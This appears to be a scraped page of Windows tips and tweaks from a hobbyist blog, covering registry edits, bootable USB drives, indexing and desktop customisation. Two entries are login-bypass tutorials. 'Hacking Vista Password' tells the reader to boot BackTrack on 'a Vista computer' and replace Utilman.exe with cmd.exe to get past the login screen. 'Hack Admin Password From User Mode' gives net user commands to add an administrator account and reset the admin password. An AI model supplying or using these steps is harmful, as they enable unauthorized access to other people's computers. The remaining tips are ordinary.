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Hacking Vista Password for recovery of password

Hacking Vista Password This tutorial is quite simple and wont require so many steps... All you need is BackTrack3,get it at Remote Exploit First of, find a Vista computer, boot BackTrack 3,4,5 at it, then load it up and go into the console.... Now that u have the console open start typing the following commands cd /mnt Then do ls Then cd sda1 Then cd windows Then cd system32 Then MV Utilman.exe Utilman.old Then cp cmd.exe Utilman.exe Then reboot Now the system is going down for reboot and now let it load up Windows Vista When u get to the login place, hit the WindowsKey + U to invoke the utility manager Then simply throw in a command whoami Then explorer Congrats You r inside the system :)

How to add "open cmd prompt" to folder context menus

Add the open cmd prompt to folder context menus Also drives and My Computer copy what's in the code area to notepad and save as cmd here.reg or you can download the registry file from the links at below Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\Drive\shell\cmd] @="Command Prompt" [HKEY_CLASSES_ROOT\Drive\shell\cmd\command] @="cmd.exe /k \"cd %L\"" [HKEY_CLASSES_ROOT\Directory\shell\cmd] @="Command Prompt" [HKEY_CLASSES_ROOT\Directory\shell\cmd\command] @="cmd.exe /k \"cd %L\"" [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\cmd] @="Command Prompt" [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\cmd\command] @="cmd.exe /k \"cd %L\"" links for the registory file is below link1        link2        link3

How To make Pendrive or USB Drive Bootable

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We boot our computer with the help of Bootable OS CD/DVD.But sometime the CD/DVD is not available with us but we have the ISO image of the file. So instead of burn that ISO image to a CD/DVD you can use your PenDrive/USB Drive as a bootable Device and boot your OS from that bootable USB Drive. Question is how we make our PenDrive/USB Drive bootable.So here is a very Simple Solution. For This You have to Download a software called "ULTRAISO" You can Download it from links below.. link1                         link2 Click here than wait for few seconds and than click on skip add... Click on the SKIP AD> and proceed to Download... After You Downloaded The file Install it to Your Computer. Now carefully Follow The following Steps to Make Your USB/PENDDRIVE Bootable. 1.If You are using Vista/Windows 7 than Run UltraIso using the Administrator Privillage.Or s...

Turn ON/OFF Num Lock on Startup

Most of standard keyboards come with a small numeric keypad which identified by the numbers from 0 to 9. However, this numeric keypad is also served for some other functions such as "Page Up", "Page Down", "End", "Home", etc... depending on which mode of the "Num Lock" is being used.  Many Windows users find this numeric keypad useful to type the numbers faster. But oopps... after hitting a several keys on the numeric keypad, you recognize the outcomes are not what you expected. Then you recognize the "Num Lock" mode is "OFF", so you just need to switch it on, and... start over your typing! The bad news is, by default, Windows turns the Num Lock off; however, the good news is, you can configure Windows to turn this Num Lock ON so that whenever you mean "number", you really get a number. Read on, you'll get the details how to set Windows to keep the Num Lock status "ON" as default. In fac...

Speed Up or Disable Windows Search Indexing in Vista,7

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Speed Up or Disable Windows Search Indexing in Vista, 7 The new indexing service built into Windows Vista has been the subject of a lot of complaints, since it seems to kick in at strange times and thrash your hard drive. So what can we do to speed this up? There's two options: You can either trim down the amount of files that Windows Search is indexing, or you can disable it entirely if you never use the search. Trim Down Indexing Locations The best way to trim down the amount of processor time the indexing service uses is by trimming down the amount of files being indexed. For instance, if you don't regularly search through your C: drive, there's really no need to be indexing it. Personally, I love the search function for Outlook and the Start Menu, but that's the only places I care about indexing.  Type   Indexing   into the control panel search or the start menu search box, and you should see an item called Indexing Options.     Here ...

PLAY VISTA GAMES ON XP

The Files are Seperated in to 3 Parts, each part isnt not linked so you can download part 1 and you wont need the others to extract the first part.  Part 1 Contains:  > Minesweeper fix  > Minesweeper  > Freecell  > Hearts  > Inkball  > Vista.Emulation.dll  Part 2 Contains:  > Shanghi  > Solitaire  > Spider Solitaire  Part 2 Contains:  > Purble Place  :: INSTRUCTIONS ::  Just click on the games to play, they will automatically create “Microsoft Games” in your PROGRAM FILES, and will add a shortcut to your start menu under Vista_Games so when you want to play them again you don’t have to keep running them where you saved them. Make sure you have Vista.Emulation.DLL in the c:\windows\system32 folder other wise these will not work  To make Minesweeper work:  Extract minesweeper.bat in the directory containing minesweeper.exe  create a shortcut to desktop or something like...

Windows Vista Login Hacks

Helen Keller said, "Security is mostly a superstition," which might explain why computer security is such a profitable business. Indeed, security has been a major selling point for Windows Vista, despite the fact that some of its best security features are turned off by default.  For example, a password—that teensy group of characters that none of us seems capable of committing to memory—is optional in Vista, yet you can't share files on a network without one. Of course, once you create a password, you're doomed to retype it each time you power on your PC. And thus begin the daily visits to the Welcome/log-in screen. Fortunately, there are a few things you can do to tweak this seemingly invariable interface, for convenience and greater system security.  Note that all these hacks require administrator-level privileges. Log In Automatically Vista Log-In  To keep your password intact yet skip the Welcome screen and have Vista log you in automatically each time you start...

Forgot Windows XP Password ?

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Yes it is possible to change Adminstrator password both in Win XP , Vista and 7 without knowing it. If you somehow manage to login as an Administrator then you can change the password without knowing it. Here’s the Step-By-Step instructions 1. Right-click on the “My Computer” icon on the desktop OR in the Start Menu. 2. Select the option “Manage”. 3. On the left pane expand the “Computer Management (Local) tree (if it is not already expanded) 4. Double click “Local Users and Groups” option From “System Tools” tree. 5. Click the “Users” option. 6. Now you will see the list of users on the right side pane, such as Administrator, Guest etc. 7. Right click the “Administrator” and select the option “Set Password” option. 8. Now you will see a warning message, Click on proceed. 9. Now the system asks you for “New Password” and “Confirm Password” . 10. After entering the password click on “OK”. The password is changed. That’s It!

How to Hide the drives(c,d....etc) in MY COMPUTER

This is a great trick you can play on your friends. To disable the display of local or networked drives when you click My Computer.  1.Go to start->run.Type regedit.Now go to:  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer  Now in the right pane create a new DWORD item and name it NoDrives(it is case sensitive). Now modify it's value and set it to 3FFFFFF (Hexadecimal) .Now restart your computer. So, now when you click on My Computer, no drives will be shown(all gone...). To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your computer.You can now see all the drives again. Magic........lol..

Fast Menu Opening....

Go to Start then Run  Type 'Regedit' then click 'Ok'  Find "HKEY_CURRENT_USER\Control Panel\Desktop\"  Select "MenuShowDelay"  Right click and select "Modify'  Reduce the number to around "100"  This is the delay time before a menu is opened. You can set it to "0" but it can make windows really hard to use as menus will open if you just look at them - well move your mouse over them anyway. I tend to go for anywhere between 50-150 depending on my mood.

Hack Admin Password From User Mode

Disclaimer : Use this article for eductational purpose ONLY.  Follow these steps:  1. Open command prompt (Start->Run->cmd),  2. Enter the following command, then press ENTER  3. Enter the followin command, then press ENTER:  compmgmt.msc  This should open the computer management console.  4. Go to local users & groups->users. Right click on any user and select "set password".  If you get a "access denied" do the following:  start>run>cmd  then use following commands  1) net user test /add (this command will make test named user)  2) net localgroup administrators test /add (this command will make test user as administrators rights)  and use net user command to reset your admin. password

How to make your Desktop Icons Transparent

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Go to  Control Panel >  System, >  Advanced >  Performance area >  Settings button Visual Effects tab "Use drop shadows for icon labels on the Desktop"

How to Remove Windows XP's Messenger

Theoretically, you can get rid of it (as well as a few other things). Windows 2000 power users should already be familiar with this tweak.  Fire up the Windows Explorer and navigate your way to the %SYSTEMROOT% \ INF folder. What the heck is that thingy with the percentage signs? It's a variable. For most people, %SYSTEMROOT% is C:\Windows. For others, it may be E:\WinXP. Get it? Okay, on with the hack! In the INF folder, open sysoc.inf (but not before making a BACKUP copy first). Before your eyes glaze over, look for the line containing "msmsgs" in it. Near the end of that particular line, you'll notice that the word "hide" is not so hidden. Go ahead and delete "hide" (so that the flanking commas are left sitting next to one another). Save the file and close it. Now, open the Add and Remove Programs applet in the Control Panel. Click the Add / Remove Windows Components icon. You should see "Windows Messenger" in that list. Remove the ...

Change Text and Baloon Tip

Change Text and Baloon Tip Associated With All Desktop Icons You need to know the object's class ID (CLSID), which uniquely identifies each system object. The following table lists the CLSIDs for common desktop objects. CLSIDs for desktop objects Desktop object CLSID My Computer {20D04FE0-3AEA-1069-A2D8-08002B30309D} Recycle Bin {645FF040-5081-101B-9F08-00AA002F954E} Microsoft Outlook {00020D75-0000-0000-C000-000000000046} Internet Explorer {FBF23B42-E3F0-101B-8488-00AA003E56F8} The Internet {3DC7A020-0ACD-11CF-A9BB-00AA004AE837} My Network Places {208D2C60-3AEA-1069-A2D7-08002B30309D} Briefcase {85BBD920-42A0-1069-A2E4-08002B30309D} Dial-Up Networking {992CFFA0-F557-101A-88EC-00DD010CCC48} Run the Registry Editor, go to HKEY_CLASSES_ROOT\CLSID, a key that lets you change characteristics of system objects, and highlight the CLSID whose name or balloon text you want to change. For example, to change My Computer, highlight the subkey HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-10...

Set the Search Screen to the Classic Look

When I first saw the default search pane in Windows XP, my instinct was to return it to its classic look; that puppy had to go. Of course, I later discovered that a doggie door is built into the applet. Click "Change preferences" then "Without an animated screen character." If you'd rather give it a bare-bones "Windows 2000" look and feel, fire up your Registry editor and navigate to:  HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ CabinetState.  You may need to create a new string value labeled "Use Search Asst" and set it to "no".

Secrets Behind The Run Registry key

You can start or stop programs from executing at bootup by adding or deleting them to/from the run Keys in the Registry. Windows loads programs to start in the following order; Program listed in the Local Machine hive, then the Current User hive, then theWin.ini Run= and Load = lines and then finally programs in your Start Up folder. To add or remove programs in the Registry. Open RegEdit. .Go to the desired Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Micrsoft\Windows\CurrentVersion\RunServices HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices Add a new String Value and name it anything you like. For the value data, enter the path and executable for the program you want to run. By adding the value to the KEY_CURRENT_USER hive instead allows the program to start only when that user is logged on. If you add the value to the RunOnce key the pro...

Change Icons of your Desktop Objects

Change Icons of your Desktop Objects(MyComputer, Recycle bin..) Go to HKEY_CLASSES_ROOT\CLSID, and look for the CLSID subkey from the table above for the object whose icon you want to change. Open the subkey and then the DefaultIcon subkey under that. To change the icon for My Computer, open the subkey HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon. Change the Default value to the path of the icon that you want displayed. Follow the same for changing the icons of ther items as well. Exit the Registry. You might have to reboot for the new settings to take effect. If you aren't able to change your icons still, then try editing the following: HKEY_CURRENT_USER\Software\Microsoft \Windows\CurrentVersion \ Explorer\ CLSID\, and you will be in.

Add folders and files in Windows Vista

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In Windows Vista, you can add folders to Favorite Links in the navigation pane so that you can open them from any folder window at any time. To do this, first open the folder that contains the subfolder you want to add. Then simply drag its icon from the original folder to where you want it in the navigation pane. You can also click Folders at the bottom of the pane and drag a folder from the folder list up into the Favorite Links section of the pane. Note: You can’t add individual files to Favorite Links, but you can add them to any folder in Favorite Links.   Pictures folder in Windows

Auto End Tasks to Enable a Proper Shutdown

This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit. 1. Copy the following (everything in the box) into notepad. QUOTE Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management] "ClearPageFileAtShutdown"=dword:00000001 [HKEY_USERS\.DEFAULT\Control Panel\Desktop] "AutoEndTasks"="1" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control] "WaitToKillServiceTimeout"="1000" 2. Save the file as shutdown.reg 3. Double click the file to import into your registry. NOTE: If your anti-virus software warns you of a "malicious" script, this is normal if you have "Script Safe" or similar technology enabled.

Turn Off System Restore to Save Space

By default, Windows XP keeps a backup of system files in the System Volume Information folder. This can eat up valuable space on your hard drive. If you don't want Windows to back up your system files: • Open the Control Panel. • Double-click on System. • Click the System Restore tab. • Check "Turn off System Restore on all drives". • Hit Apply. • You may now delete the System Volume Information folder. Warning! If you turn this off you will not be able to use Windows System Restore to restore your system in case of failure.